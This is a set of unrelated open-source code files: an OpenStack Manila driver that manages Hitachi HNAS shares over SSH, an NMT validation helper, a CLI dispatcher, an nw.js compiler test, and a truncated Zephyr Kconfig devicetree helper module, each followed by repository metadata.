from oslo_log import log
from oslo_utils import strutils
from oslo_utils import units
import paramiko
import six
import os
import time
from manila import exception
from manila.i18n import _
from manila import utils as mutils
LOG = log.getLogger(__name__)
class HNASSSHBackend(object):
def __init__(self, hnas_ip, hnas_username, hnas_password, ssh_private_key,
cluster_admin_ip0, evs_id, evs_ip, fs_name, job_timeout):
self.ip = hnas_ip
self.port = 22
self.user = hnas_username
self.password = hnas_password
self.priv_key = ssh_private_key
self.admin_ip0 = cluster_admin_ip0
self.evs_id = six.text_type(evs_id)
self.fs_name = fs_name
self.evs_ip = evs_ip
self.sshpool = None
self.job_timeout = job_timeout
LOG.debug("Hitachi HNAS Driver using SSH backend.")
def get_stats(self):
"""Get the stats from file-system.
:returns:
fs_capacity.size = Total size from filesystem.
available_space = Free space currently on filesystem.
dedupe = True if dedupe is enabled on filesystem.
"""
command = ['df', '-a', '-f', self.fs_name]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not get HNAS backend stats.")
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
line = output.split('\n')
fs = Filesystem(line[3])
available_space = fs.size - fs.used
return fs.size, available_space, fs.dedupe
def nfs_export_add(self, share_id, snapshot_id=None):
if snapshot_id is not None:
path = os.path.join('/snapshots', share_id, snapshot_id)
name = os.path.join('/snapshots', snapshot_id)
else:
path = name = os.path.join('/shares', share_id)
command = ['nfs-export', 'add', '-S', 'disable', '-c', '127.0.0.1',
name, self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not create NFS export %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def nfs_export_del(self, share_id=None, snapshot_id=None):
if share_id is not None:
name = os.path.join('/shares', share_id)
elif snapshot_id is not None:
name = os.path.join('/snapshots', snapshot_id)
else:
msg = _("NFS export not specified to delete.")
raise exception.HNASBackendException(msg=msg)
command = ['nfs-export', 'del', name]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'does not exist' in e.stderr:
LOG.warning("Export %s does not exist on "
"backend anymore.", name)
else:
msg = _("Could not delete NFS export %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_share_add(self, share_id, snapshot_id=None):
if snapshot_id is not None:
path = r'\\snapshots\\' + share_id + r'\\' + snapshot_id
name = snapshot_id
else:
path = r'\\shares\\' + share_id
name = share_id
command = ['cifs-share', 'add', '-S', 'disable', '--enable-abe',
'--nodefaultsaa', name, self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not create CIFS share %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_share_del(self, name):
command = ['cifs-share', 'del', '--target-label', self.fs_name,
name]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if e.exit_code == 1:
LOG.warning("CIFS share %s does not exist on "
"backend anymore.", name)
else:
msg = _("Could not delete CIFS share %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def get_nfs_host_list(self, share_id):
export = self._get_export(share_id)
return export[0].export_configuration
def update_nfs_access_rule(self, host_list, share_id=None,
snapshot_id=None):
if share_id is not None:
name = os.path.join('/shares', share_id)
elif snapshot_id is not None:
name = os.path.join('/snapshots', snapshot_id)
else:
msg = _("No share/snapshot provided to update NFS rules.")
raise exception.HNASBackendException(msg=msg)
command = ['nfs-export', 'mod', '-c']
if len(host_list) == 0:
command.append('127.0.0.1')
else:
string_command = '"' + six.text_type(host_list[0])
for i in range(1, len(host_list)):
string_command += ',' + (six.text_type(host_list[i]))
string_command += '"'
command.append(string_command)
command.append(name)
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not update access rules for NFS export %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
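    # --- Hedged illustration (not part of the original module) ---
    # For host_list == ['10.0.0.1', '10.0.0.2'] the loop above builds the
    # single quoted argument '"10.0.0.1,10.0.0.2"', so the backend sees:
    #   nfs-export mod -c "10.0.0.1,10.0.0.2" /shares/<share_id>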
def cifs_allow_access(self, name, user, permission, is_snapshot=False):
command = ['cifs-saa', 'add', '--target-label', self.fs_name,
name, user, permission]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'already listed as a user' in e.stderr:
if is_snapshot:
LOG.debug('User %(user)s already allowed to access '
'snapshot %(snapshot)s.', {
'user': user,
'snapshot': name,
})
else:
self._update_cifs_rule(name, user, permission)
else:
entity_type = "share"
if is_snapshot:
entity_type = "snapshot"
msg = _("Could not add access of user %(user)s to "
"%(entity_type)s %(name)s.") % {
'user': user,
'name': name,
'entity_type': entity_type,
}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def _update_cifs_rule(self, name, user, permission):
LOG.debug('User %(user)s already allowed to access '
'share %(share)s. Updating access level...', {
'user': user,
'share': name,
})
command = ['cifs-saa', 'change', '--target-label', self.fs_name,
name, user, permission]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not update access of user %(user)s to "
"share %(share)s.") % {
'user': user,
'share': name,
}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def cifs_deny_access(self, name, user, is_snapshot=False):
command = ['cifs-saa', 'delete', '--target-label', self.fs_name,
name, user]
entity_type = "share"
if is_snapshot:
entity_type = "snapshot"
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if ('not listed as a user' in e.stderr or
'Could not delete user/group' in e.stderr):
LOG.warning('User %(user)s already not allowed to access '
'%(entity_type)s %(name)s.', {
'entity_type': entity_type,
'user': user,
'name': name
})
else:
msg = _("Could not delete access of user %(user)s to "
"%(entity_type)s %(name)s.") % {
'user': user,
'name': name,
'entity_type': entity_type,
}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def list_cifs_permissions(self, hnas_share_id):
command = ['cifs-saa', 'list', '--target-label', self.fs_name,
hnas_share_id]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if 'No entries for this share' in e.stderr:
LOG.debug('Share %(share)s does not have any permission '
'added.', {'share': hnas_share_id})
return []
else:
msg = _("Could not list access of share %s.") % hnas_share_id
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
permissions = CIFSPermissions(output)
return permissions.permission_list
def tree_clone(self, src_path, dest_path):
command = ['tree-clone-job-submit', '-e', '-f', self.fs_name,
src_path, dest_path]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if ('Cannot find any clonable files in the source directory' in
e.stderr):
msg = _("Source path %s is empty.") % src_path
LOG.debug(msg)
raise exception.HNASNothingToCloneException(msg=msg)
else:
msg = _("Could not submit tree clone job to clone from %(src)s"
" to %(dest)s.") % {'src': src_path, 'dest': dest_path}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
job_submit = JobSubmit(output)
if job_submit.request_status == 'Request submitted successfully':
job_id = job_submit.job_id
job_status = None
progress = ''
job_rechecks = 0
starttime = time.time()
deadline = starttime + self.job_timeout
while (not job_status or
job_status.job_state != "Job was completed"):
command = ['tree-clone-job-status', job_id]
output, err = self._execute(command)
job_status = JobStatus(output)
if job_status.job_state == 'Job failed':
break
old_progress = progress
progress = job_status.data_bytes_processed
if old_progress == progress:
job_rechecks += 1
now = time.time()
if now > deadline:
command = ['tree-clone-job-abort', job_id]
self._execute(command)
LOG.error("Timeout in snapshot creation from "
"source path %s.", src_path)
msg = _("Share snapshot of source path %s "
"was not created.") % src_path
raise exception.HNASBackendException(msg=msg)
else:
time.sleep(job_rechecks ** 2)
else:
job_rechecks = 0
if (job_status.job_state, job_status.job_status,
job_status.directories_missing,
job_status.files_missing) == ("Job was completed",
"Success", '0', '0'):
LOG.debug("Snapshot of source path %(src)s to destination "
"path %(dest)s created successfully.",
{'src': src_path,
'dest': dest_path})
else:
LOG.error('Error creating snapshot of source path %s.',
src_path)
msg = _('Snapshot of source path %s was not '
'created.') % src_path
raise exception.HNASBackendException(msg=msg)
def tree_delete(self, path):
command = ['tree-delete-job-submit', '--confirm', '-f', self.fs_name,
path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'Source path: Cannot access' in e.stderr:
LOG.warning("Attempted to delete path %s "
"but it does not exist.", path)
else:
msg = _("Could not submit tree delete job to delete path "
"%s.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
@mutils.retry(exception=exception.HNASSSCContextChange, wait_random=True,
retries=5)
def create_directory(self, dest_path):
self._locked_selectfs('create', dest_path)
if not self.check_directory(dest_path):
msg = _("Command to create directory %(path)s was run in another "
"filesystem instead of %(fs)s.") % {
'path': dest_path,
'fs': self.fs_name,
}
LOG.warning(msg)
raise exception.HNASSSCContextChange(msg=msg)
@mutils.retry(exception=exception.HNASSSCContextChange, wait_random=True,
retries=5)
def delete_directory(self, path):
try:
self._locked_selectfs('delete', path)
except exception.HNASDirectoryNotEmpty:
pass
else:
if self.check_directory(path):
msg = _("Command to delete empty directory %(path)s was run in"
" another filesystem instead of %(fs)s.") % {
'path': path,
'fs': self.fs_name,
}
LOG.debug(msg)
raise exception.HNASSSCContextChange(msg=msg)
@mutils.retry(exception=exception.HNASSSCIsBusy, wait_random=True,
retries=5)
def check_directory(self, path):
command = ['path-to-object-number', '-f', self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'path-to-object-number is currently running' in e.stdout:
msg = (_("SSC command path-to-object-number for path %s "
"is currently busy.") % path)
raise exception.HNASSSCIsBusy(msg=msg)
if 'Unable to locate component:' in e.stdout:
LOG.debug("Cannot find %(path)s: %(out)s",
{'path': path, 'out': e.stdout})
return False
else:
msg = _("Could not check if path %s exists.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
return True
def check_fs_mounted(self):
command = ['df', '-a', '-f', self.fs_name]
output, err = self._execute(command)
if "not found" in output:
msg = _("Filesystem %s does not exist or it is not available "
"in the current EVS context.") % self.fs_name
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
line = output.split('\n')
fs = Filesystem(line[3])
return fs.mounted
def mount(self):
command = ['mount', self.fs_name]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'file system is already mounted' not in e.stderr:
msg = _("Failed to mount filesystem %s.") % self.fs_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def vvol_create(self, vvol_name):
# create a virtual-volume inside directory
path = '/shares/' + vvol_name
command = ['virtual-volume', 'add', '--ensure', self.fs_name,
vvol_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Failed to create vvol %s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def vvol_delete(self, vvol_name):
path = '/shares/' + vvol_name
# Virtual-volume and quota are deleted together
command = ['tree-delete-job-submit', '--confirm', '-f',
self.fs_name, path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'Source path: Cannot access' in e.stderr:
LOG.warning("Share %s does not exist.", vvol_name)
else:
msg = _("Failed to delete vvol %s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def quota_add(self, vvol_name, vvol_quota):
str_quota = six.text_type(vvol_quota) + 'G'
command = ['quota', 'add', '--usage-limit',
str_quota, '--usage-hard-limit',
'yes', self.fs_name, vvol_name]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Failed to add %(quota)s quota to vvol "
"%(vvol)s.") % {'quota': str_quota, 'vvol': vvol_name}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def modify_quota(self, vvol_name, new_size):
str_quota = six.text_type(new_size) + 'G'
command = ['quota', 'mod', '--usage-limit', str_quota,
self.fs_name, vvol_name]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Failed to update quota of vvol %(vvol)s to "
"%(quota)s.") % {'quota': str_quota, 'vvol': vvol_name}
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
def check_vvol(self, vvol_name):
command = ['virtual-volume', 'list', '--verbose', self.fs_name,
vvol_name]
try:
self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Virtual volume %s does not exist.") % vvol_name
LOG.exception(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def check_quota(self, vvol_name):
command = ['quota', 'list', '--verbose', self.fs_name, vvol_name]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError:
msg = _("Could not check quota of vvol %s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
if 'No quotas matching specified filter criteria' in output:
msg = _("Virtual volume %s does not have any"
" quota.") % vvol_name
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def check_export(self, vvol_name, is_snapshot=False):
export = self._get_export(vvol_name, is_snapshot=is_snapshot)
if (vvol_name in export[0].export_name and
self.fs_name in export[0].file_system_label):
return
else:
msg = _("Export %s does not exist.") % export[0].export_name
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def check_cifs(self, vvol_name):
output = self._cifs_list(vvol_name)
cifs_share = CIFSShare(output)
if self.fs_name != cifs_share.fs:
msg = _("CIFS share %(share)s is not located in "
"configured filesystem "
"%(fs)s.") % {'share': vvol_name,
'fs': self.fs_name}
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
def is_cifs_in_use(self, vvol_name):
output = self._cifs_list(vvol_name)
cifs_share = CIFSShare(output)
return cifs_share.is_mounted
def _cifs_list(self, vvol_name):
command = ['cifs-share', 'list', vvol_name]
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if 'does not exist' in e.stderr:
msg = _("CIFS share %(share)s was not found in EVS "
"%(evs_id)s") % {'share': vvol_name,
'evs_id': self.evs_id}
LOG.exception(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
msg = _("Could not list CIFS shares by vvol name "
"%s.") % vvol_name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
return output
def get_share_quota(self, share_id):
command = ['quota', 'list', self.fs_name, share_id]
output, err = self._execute(command)
quota = Quota(output)
if quota.limit is None:
return None
if quota.limit_unit == 'TB':
return quota.limit * units.Ki
elif quota.limit_unit == 'GB':
return quota.limit
else:
msg = _("Share %s does not support quota values "
"below 1G.") % share_id
LOG.error(msg)
raise exception.HNASBackendException(msg=msg)
def get_share_usage(self, share_id):
command = ['quota', 'list', self.fs_name, share_id]
output, err = self._execute(command)
quota = Quota(output)
if quota.usage is None:
msg = _("Virtual volume %s does not have any quota.") % share_id
LOG.error(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
bytes_usage = strutils.string_to_bytes(six.text_type(quota.usage) +
quota.usage_unit)
return bytes_usage / units.Gi
def _get_export(self, name, is_snapshot=False):
if is_snapshot:
name = '/snapshots/' + name
else:
name = '/shares/' + name
        command = ['nfs-export', 'list', name]
export_list = []
try:
output, err = self._execute(command)
except processutils.ProcessExecutionError as e:
if 'does not exist' in e.stderr:
msg = _("Export %(name)s was not found in EVS "
"%(evs_id)s.") % {
'name': name,
'evs_id': self.evs_id,
}
LOG.exception(msg)
raise exception.HNASItemNotFoundException(msg=msg)
else:
msg = _("Could not list NFS exports by name %s.") % name
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
items = output.split('Export name')
if items[0][0] == '\n':
items.pop(0)
for i in range(0, len(items)):
export_list.append(Export(items[i]))
return export_list
@mutils.retry(exception=exception.HNASConnException, wait_random=True)
def _execute(self, commands):
command = ['ssc', '127.0.0.1']
if self.admin_ip0 is not None:
command = ['ssc', '--smuauth', self.admin_ip0]
command += ['console-context', '--evs', self.evs_id]
commands = command + commands
mutils.check_ssh_injection(commands)
commands = ' '.join(commands)
if not self.sshpool:
self.sshpool = mutils.SSHPool(ip=self.ip,
port=self.port,
conn_timeout=None,
login=self.user,
password=self.password,
privatekey=self.priv_key)
with self.sshpool.item() as ssh:
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
out, err = processutils.ssh_execute(ssh, commands,
check_exit_code=True)
LOG.debug("Command %(cmd)s result: out = %(out)s - err = "
"%(err)s.", {
'cmd': commands,
'out': out,
'err': err,
})
return out, err
except processutils.ProcessExecutionError as e:
if 'Failed to establish SSC connection' in e.stderr:
msg = _("Failed to establish SSC connection.")
LOG.debug(msg)
raise exception.HNASConnException(msg=msg)
else:
LOG.debug("Error running SSH command. "
"Command %(cmd)s result: out = %(out)s - err = "
"%(err)s - exit = %(exit)s.", {
'cmd': e.cmd,
'out': e.stdout,
'err': e.stderr,
'exit': e.exit_code,
})
raise
@mutils.synchronized("hitachi_hnas_select_fs", external=True)
def _locked_selectfs(self, op, path):
if op == 'create':
command = ['selectfs', self.fs_name, '\n',
'ssc', '127.0.0.1', 'console-context', '--evs',
self.evs_id, 'mkdir', '-p', path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if "Current file system invalid: VolumeNotFound" in e.stderr:
msg = _("Command to create directory %s failed due to "
"context change.") % path
LOG.debug(msg)
raise exception.HNASSSCContextChange(msg=msg)
else:
msg = _("Failed to create directory %s.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
if op == 'delete':
command = ['selectfs', self.fs_name, '\n',
'ssc', '127.0.0.1', 'console-context', '--evs',
self.evs_id, 'rmdir', path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'DirectoryNotEmpty' in e.stderr:
msg = _("Share %s has more snapshots.") % path
LOG.debug(msg)
raise exception.HNASDirectoryNotEmpty(msg=msg)
elif 'cannot remove' in e.stderr and 'NotFound' in e.stderr:
LOG.warning("Attempted to delete path %s but it does "
"not exist.", path)
elif 'Current file system invalid: VolumeNotFound' in e.stderr:
msg = _("Command to delete empty directory %s failed due "
"to context change.") % path
LOG.debug(msg)
raise exception.HNASSSCContextChange(msg=msg)
else:
msg = _("Failed to delete directory %s.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
class Export(object):
def __init__(self, data):
if data:
split_data = data.split('Export configuration:\n')
items = split_data[0].split('\n')
self.export_name = items[0].split(':')[1].strip()
self.export_path = items[1].split(':')[1].strip()
if '*** not available ***' in items[2]:
self.file_system_info = items[2].split(':')[1].strip()
index = 0
else:
self.file_system_label = items[2].split(':')[1].strip()
self.file_system_size = items[3].split(':')[1].strip()
self.file_system_free_space = items[4].split(':')[1].strip()
self.file_system_state = items[5].split(':')[1]
self.formatted = items[6].split('=')[1].strip()
self.mounted = items[7].split('=')[1].strip()
self.failed = items[8].split('=')[1].strip()
self.thin_provisioned = items[9].split('=')[1].strip()
index = 7
self.access_snapshots = items[3 + index].split(':')[1].strip()
self.display_snapshots = items[4 + index].split(':')[1].strip()
self.read_caching = items[5 + index].split(':')[1].strip()
self.disaster_recovery_setting = items[6 + index].split(':')[1]
self.recovered = items[7 + index].split('=')[1].strip()
self.transfer_setting = items[8 + index].split('=')[1].strip()
self.export_configuration = []
export_config = split_data[1].split('\n')
for i in range(0, len(export_config)):
if any(j.isdigit() or j.isalpha() for j in export_config[i]):
self.export_configuration.append(export_config[i])
class JobStatus(object):
def __init__(self, data):
if data:
lines = data.split("\n")
self.job_id = lines[0].split()[3]
self.physical_node = lines[2].split()[3]
self.evs = lines[3].split()[2]
self.volume_number = lines[4].split()[3]
self.fs_id = lines[5].split()[4]
self.fs_name = lines[6].split()[4]
self.source_path = lines[7].split()[3]
self.creation_time = " ".join(lines[8].split()[3:5])
self.destination_path = lines[9].split()[3]
self.ensure_path_exists = lines[10].split()[5]
self.job_state = " ".join(lines[12].split()[3:])
self.job_started = " ".join(lines[14].split()[2:4])
self.job_ended = " ".join(lines[15].split()[2:4])
self.job_status = lines[16].split()[2]
error_details_line = lines[17].split()
if len(error_details_line) > 3:
self.error_details = " ".join(error_details_line[3:])
else:
self.error_details = None
self.directories_processed = lines[18].split()[3]
self.files_processed = lines[19].split()[3]
self.data_bytes_processed = lines[20].split()[4]
self.directories_missing = lines[21].split()[4]
self.files_missing = lines[22].split()[4]
self.files_skipped = lines[23].split()[4]
skipping_details_line = lines[24].split()
if len(skipping_details_line) > 3:
self.skipping_details = " ".join(skipping_details_line[3:])
else:
self.skipping_details = None
class JobSubmit(object):
def __init__(self, data):
if data:
split_data = data.replace(".", "").split()
self.request_status = " ".join(split_data[1:4])
self.job_id = split_data[8]
class Filesystem(object):
def __init__(self, data):
if data:
items = data.split()
self.id = items[0]
self.label = items[1]
self.evs = items[2]
self.size = float(items[3])
self.size_measure = items[4]
if self.size_measure == 'TB':
self.size = self.size * units.Ki
if items[5:7] == ["Not", "mounted"]:
self.mounted = False
else:
self.mounted = True
self.used = float(items[5])
self.used_measure = items[6]
if self.used_measure == 'TB':
self.used = self.used * units.Ki
self.dedupe = 'dedupe enabled' in data
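# Illustrative parse (the input below is a hypothetical 'df'-style row, not
# captured HNAS output):
#   fs = Filesystem('1025 fs01 2 250 GB 21.4 GB')
#   fs.size -> 250.0, fs.size_measure -> 'GB', fs.used -> 21.4,
#   fs.mounted -> True, fs.dedupe -> False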
class Quota(object):
def __init__(self, data):
if data:
if 'No quotas matching' in data:
self.type = None
self.target = None
self.usage = None
self.usage_unit = None
self.limit = None
self.limit_unit = None
else:
items = data.split()
self.type = items[2]
self.target = items[6]
self.usage = items[9]
self.usage_unit = items[10]
if items[13] == 'Unset':
self.limit = None
else:
self.limit = float(items[13])
self.limit_unit = items[14]
class CIFSPermissions(object):
def __init__(self, data):
self.permission_list = []
hnas_cifs_permissions = [('Allow Read', 'ar'),
('Allow Change & Read', 'acr'),
('Allow Full Control', 'af'),
('Deny Read', 'dr'),
('Deny Change & Read', 'dcr'),
('Deny Full Control', 'df')]
lines = data.split('\n')
for line in lines:
filtered = list(filter(lambda x: x[0] in line,
hnas_cifs_permissions))
if len(filtered) == 1:
token, permission = filtered[0]
user = line.split(token)[1:][0].strip()
self.permission_list.append((user, permission))
class CIFSShare(object):
def __init__(self, data):
lines = data.split('\n')
for line in lines:
if 'File system label' in line:
self.fs = line.split(': ')[1]
elif 'Share users' in line:
users = line.split(': ')
self.is_mounted = users[1] != '0'
|
bswartz/manila
|
manila/share/drivers/hitachi/hnas/ssh.py
|
Python
|
apache-2.0
| 35,481
|
import torch
import numpy as np
from utils import alphaPlot
def validate(model, val_iter, writer):
model.eval()
    if len(val_iter) == 1:
        random_batch = 0
    else:
        # randint's upper bound is exclusive, so this samples every batch
        random_batch = np.random.randint(0, len(val_iter))
    for i, batch in enumerate(val_iter):
        outputs, alpha = model(batch.src, maxLen=len(batch.tgt[1:]))
        (seq_len, batch_size, vocab_size) = outputs.size()
        if i != random_batch:
            continue
        # tensorboard logging for the one randomly chosen batch
        preds = outputs.topk(1)[1]
        source = model.src2txt(batch.src[:, 0].data)
        target = model.tgt2txt(batch.tgt[1:, 0].data)
        output = model.tgt2txt(preds[:, 0].data)
        alpha_plot = alphaPlot(alpha[0], output, source)
        writer.add_image('Attention', alpha_plot, dataformats='HWC')
        writer.add_text('Source: ', source)
        writer.add_text('Output: ', output)
        writer.add_text('Target: ', target)
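# Hedged usage sketch (illustrative; 'model' and 'val_iter' come from the
# surrounding training script and are not defined in this module):
#   from torch.utils.tensorboard import SummaryWriter
#   writer = SummaryWriter(log_dir='runs/neuralmt')
#   validate(model, val_iter, writer)
#   writer.close()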
|
anoopsarkar/nlp-class-hw
|
neuralmt/validator.py
|
Python
|
apache-2.0
| 912
|
def parser(args, actions):
for action in actions:
if args.get(action):
return actions[action](**args)
    # raising a bare class requires an Exception subclass; this local
    # NotImplemented deliberately shadows the builtin singleton
    raise NotImplemented
class NotImplemented(Exception):
    pass
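# Hedged usage sketch (the 'greet' action and argument dict are hypothetical):
#   def greet(greet=False, name='world', **_):
#       print('hello %s' % name)
#   parser({'greet': True, 'name': 'world'}, {'greet': greet})
#   # -> calls greet(greet=True, name='world')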
|
demophoon/sams-client
|
client/cli.py
|
Python
|
mit
| 184
|
import time
import os
import shutil
import subprocess
import platform
from subprocess import Popen, PIPE
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
testdir = os.path.dirname(os.path.abspath(__file__))
chrome_options.add_argument("nwapp=" + testdir)
binfile = os.path.join(testdir, "mytest.bin")
nwjc = os.path.join(os.path.dirname(os.environ['CHROMEDRIVER']), "nwjc.exe" if os.name == "nt" else "nwjc")
os.chdir(testdir)
try:
os.remove(binfile)
except:
pass
assert(False == os.path.isfile(binfile))
subprocess.call([nwjc, "mytest.js", "mytest.bin"])
assert(os.path.isfile(binfile))
if platform.system() == 'Linux':
proc = Popen(['strings', 'mytest.bin'], stdout=PIPE, stderr=PIPE)
out, err = proc.communicate()
print out
assert("42" not in out)
assert("foo" not in out)
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(5)
try:
print driver.current_url
result = driver.find_element_by_id('result')
print result.get_attribute('innerHTML')
assert("44" == result.get_attribute('innerHTML'))
result2 = driver.find_element_by_id('result2').get_attribute('innerHTML')
print result2
assert("function mytest() { [native code] }" == result2)
result3 = driver.find_element_by_id('result3').get_attribute('innerHTML')
result4 = driver.find_element_by_id('result4').get_attribute('innerHTML')
assert("44" == result3)
assert("function testinner() { [native code] }" == result4)
finally:
driver.quit()
|
nwjs/nw.js
|
test/sanity/nwjc/test.py
|
Python
|
mit
| 1,606
|
# Copyright (c) 2018-2019 Linaro
# Copyright (c) 2019 Nordic Semiconductor ASA
#
# SPDX-License-Identifier: Apache-2.0
import os
import pickle
import sys
ZEPHYR_BASE = os.environ["ZEPHYR_BASE"]
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib
# Types we support
# 'string', 'int', 'hex', 'bool'
doc_mode = os.environ.get('KCONFIG_DOC_MODE') == "1"
if not doc_mode:
EDT_PICKLE = os.environ.get("EDT_PICKLE")
# The "if" handles a missing dts.
if EDT_PICKLE is not None and os.path.isfile(EDT_PICKLE):
with open(EDT_PICKLE, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
def _warn(kconf, msg):
print("{}:{}: WARNING: {}".format(kconf.filename, kconf.linenr, msg))
def _dt_units_to_scale(unit):
if not unit:
return 0
if unit in {'k', 'K'}:
return 10
if unit in {'m', 'M'}:
return 20
if unit in {'g', 'G'}:
return 30
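# Illustrative: _dt_units_to_scale('k') == 10, so a reg value of 0x8000
# (32768) right-shifted by it yields 32, i.e. the value expressed in KiB.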
def dt_chosen_label(kconf, _, chosen):
"""
This function takes a 'chosen' property and treats that property as a path
to an EDT node. If it finds an EDT node, it will look to see if that node
has a "label" property and return the value of that "label", if not we
return an empty string.
"""
if doc_mode or edt is None:
return ""
node = edt.chosen_node(chosen)
if not node:
return ""
if "label" not in node.props:
return ""
return node.props["label"].val
def dt_chosen_enabled(kconf, _, chosen):
"""
This function returns "y" if /chosen contains a property named 'chosen'
that points to an enabled node, and "n" otherwise
"""
if doc_mode or edt is None:
return "n"
node = edt.chosen_node(chosen)
return "y" if node and node.status == "okay" else "n"
def dt_chosen_path(kconf, _, chosen):
"""
This function takes a /chosen node property and returns the path
to the node in the property value, or the empty string.
"""
    if doc_mode or edt is None:
        return ""
node = edt.chosen_node(chosen)
return node.path if node else ""
def dt_node_enabled(kconf, name, node):
"""
This function is used to test if a node is enabled (has status
'okay') or not.
The 'node' argument is a string which is either a path or an
alias, or both, depending on 'name'.
If 'name' is 'dt_path_enabled', 'node' is an alias or a path. If
    'name' is 'dt_alias_enabled', 'node' is an alias.
"""
if doc_mode or edt is None:
return "n"
if name == "dt_alias_enabled":
if node.startswith("/"):
# EDT.get_node() works with either aliases or paths. If we
# are specifically being asked about an alias, reject paths.
return "n"
else:
# Make sure this is being called appropriately.
assert name == "dt_path_enabled"
try:
node = edt.get_node(node)
except edtlib.EDTError:
return "n"
return "y" if node and node.status == "okay" else "n"
def dt_nodelabel_enabled(kconf, _, label):
"""
This function is like dt_node_enabled(), but the 'label' argument
should be a node label, like "foo" is here:
foo: some-node { ... };
"""
if doc_mode or edt is None:
return "n"
node = edt.label2node.get(label)
return "y" if node and node.status == "okay" else "n"
def _node_reg_addr(node, index, unit):
if not node:
return 0
if not node.regs:
return 0
if int(index) >= len(node.regs):
return 0
if node.regs[int(index)].addr is None:
return 0
return node.regs[int(index)].addr >> _dt_units_to_scale(unit)
def _node_reg_size(node, index, unit):
if not node:
return 0
if not node.regs:
return 0
if int(index) >= len(node.regs):
return 0
if node.regs[int(index)].size is None:
return 0
return node.regs[int(index)].size >> _dt_units_to_scale(unit)
def _node_int_prop(node, prop, unit=None):
"""
This function takes a 'node' and will look to see if that 'node' has a
property called 'prop' and if that 'prop' is an integer type will return
the value of the property 'prop' as either a string int or string hex
value, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if not node:
return 0
if prop not in node.props:
return 0
if node.props[prop].type != "int":
return 0
return node.props[prop].val >> _dt_units_to_scale(unit)
def _dt_chosen_reg_addr(kconf, chosen, index=0, unit=None):
"""
This function takes a 'chosen' property and treats that property as a path
to an EDT node. If it finds an EDT node, it will look to see if that
    node has a register at the given 'index' and return the address value of
that reg, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
node = edt.chosen_node(chosen)
return _node_reg_addr(node, index, unit)
def _dt_chosen_reg_size(kconf, chosen, index=0, unit=None):
"""
This function takes a 'chosen' property and treats that property as a path
to an EDT node. If it finds an EDT node, it will look to see if that node
has a register at the given 'index' and return the size value of that reg,
if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
